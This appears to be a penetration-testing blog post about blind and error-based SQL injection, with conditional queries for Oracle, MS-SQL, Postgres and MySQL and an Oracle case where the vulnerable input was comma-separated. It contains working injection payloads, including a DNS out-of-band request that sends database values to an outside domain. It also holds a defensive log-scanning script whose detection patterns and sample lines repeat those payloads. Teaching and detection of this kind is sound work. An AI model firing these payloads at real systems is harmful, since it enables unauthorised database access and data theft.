www.notsosecure.com

From Pentesters To Pentesters

Occasionally when exploiting SQL injections there are conditions where the application does not show different pages for the true and false results of the SQL query. If the database server does not resolve host names (thus ruling out out-of-band attacks), the technique used to exploit such conditions is to call functions such as 'waitfor delay', which make the database sleep for a specified number of seconds. A true condition will thus return the output with a time delay, whereas a false condition will result in a prompt response.

In some cases the application returns different output (or an error) if the syntax of the SQL query is wrong. In these conditions, instead of carrying out time-based attacks, one can use conditional statements (IF or CASE) to manipulate the SQL query.

The following queries return a divide-by-zero error when the condition is true:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual 

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1 

update:- select case when( 1=1) then 1 else 1/0 end  

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

update:- (case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 

MY-SQL:- 

Doesn't work. Be careful: there is a denial-of-service bug in IF query handling which kills the database in old versions. 

update:- select (case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)=1 

This returns the error 'multiple rows returned by subquery' when the condition is false. 

— 

Thanks to pentestmonkey for providing some useful queries. 

– 

Recently I came across a SQL injection against an Oracle database, where the vulnerable parameter was taking comma-separated input.

Thus a valid input looked like:- index.do?id=1,200

And it was easy to confirm that it is vulnerable to SQL injection by producing true and false responses:-

True response:- index.do?id=1,200 and 1=1

False response:- index.do?id=1,200 and 1=2

This way I could carry out blind SQL injection, but then I tried to get data through out-of-band channeling and that worked too:-

example:- index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null

However, the problem arrived when I had to get data by iterating through rows. To iterate through rows I use the following syntax:-

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;

But as this application was taking comma-separated values, the comma resulted in my query being structured in some other way and the application returned an error.

A solution to this is to use the query like:-

index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+column_name+from+all_tab_columns+where+rownum<2+and+column_name+not+in(select+column_name+from+all_tab_columns+where+rownum<4))||'.a.notsosecure.com')+FROM+dual)+is+not+null

By increasing the rownum number in the inner subquery (the 4 in rownum<4) iteration could be achieved. However, as this number increases the backend queries become more and more CPU intensive. I still could not do a UNION SELECT query, as the original query selects more than one column and I could not figure out a way to do UNION SELECT without entering a comma.
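From the defender's side, the requests quoted in both posts (the boolean probes, 'waitfor delay', the CASE/IF divide-by-zero trick, the UTL_INADDR DNS callback and the comma-free rownum stepping) leave recognisable traces in web server logs. The following detection logic is an added example, not code from either post: the signature names, the constructed log lines and the callback domain 'attacker.example' (a placeholder for the real one) are all assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique discussed above; the label names are chosen for this example.
SIGNATURES = {
    "boolean-probe":     re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),        # ... and 1=1 / and 1=2
    "time-delay":        re.compile(r"\bwaitfor\s+delay\b", re.I),           # MS-SQL sleep primitive
    "conditional-error": re.compile(r"\bcase\s+when\b.*?\bend\b|\bif\s*\(.*\)\s*select\b", re.I),
    "division-by-zero":  re.compile(r"\b1\s*/\s*0\b"),                       # forced error branch
    "oob-dns":           re.compile(r"\butl_inaddr\s*\.\s*get_host_address\b", re.I),
    "rownum-iteration":  re.compile(r"\brownum\s*<\s*\d+", re.I),            # comma-free row stepping
}

# Constructed access-log fragments modelled on the requests quoted in the posts;
# 'attacker.example' is a placeholder for the callback domain.
SAMPLE_LOG = [
    '"GET /index.do?id=1,200 HTTP/1.1" 200',
    '"GET /index.do?id=1,200+and+1=2 HTTP/1.1" 200',
    '"GET /index.do?id=1+waitfor+delay+%270:0:5%27 HTTP/1.1" 200',
    '"GET /index.do?id=1+and+(select+case+when+(1=1)+then+1+else+1/0+end)=1 HTTP/1.1" 500',
    '"GET /index.do?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+user+from+dual)'
    '||%27.a.attacker.example%27)+FROM+dual)+is+not+null HTTP/1.1" 200',
    '"GET /index.do?id=1,200+and(SELECT+UTL_INADDR.get_host_address((SELECT+column_name+from+'
    'all_tab_columns+where+rownum<2+and+column_name+not+in(select+column_name+from+all_tab_columns+'
    'where+rownum<4))||%27.a.attacker.example%27)+FROM+dual)+is+not+null HTTP/1.1" 200',
]

def decode_query(request_line):
    """Return the URL-decoded query string of a log request line ('+' and %xx resolved)."""
    m = re.search(r"\?(\S*)", request_line)
    return re.sub(r"\s+", " ", unquote_plus(m.group(1))) if m else ""

def classify(request_line):
    """Sorted list of technique labels whose signature appears in the decoded query string."""
    decoded = decode_query(request_line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan(log_lines):
    """Map the index of every flagged line to its labels; clean lines are omitted."""
    return {i: labels for i, line in enumerate(log_lines) if (labels := classify(line))}

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(labels)}")
```

Decoding before matching matters: the same payload arrives as '+', '%20' or mixed encodings, and a signature applied to the raw line misses all but one form.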

—
A good resource for pentesting Oracle Application Server can be found here:-

Oracle Application Scanner (OAPscan) is also a very handy tool.